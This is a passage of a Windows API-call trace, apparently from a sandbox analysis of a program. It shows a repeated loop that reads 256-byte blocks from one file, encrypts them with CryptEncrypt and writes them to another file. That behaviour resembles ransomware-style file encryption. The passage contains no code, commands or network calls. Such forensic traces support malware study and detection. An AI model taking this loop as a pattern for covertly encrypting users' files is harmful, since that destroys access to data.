dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.605] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.605] GetLastError () returned 0x0 [0143.605] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.605] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.606] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.606] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.606] GetLastError () returned 0x0 [0143.606] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.607] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.607] GetLastError () returned 0x0 [0143.607] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.607] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.608] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.608] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.608] GetLastError () returned 0x0 [0143.608] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.609] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.609] GetLastError () returned 0x0 [0143.609] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.609] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, 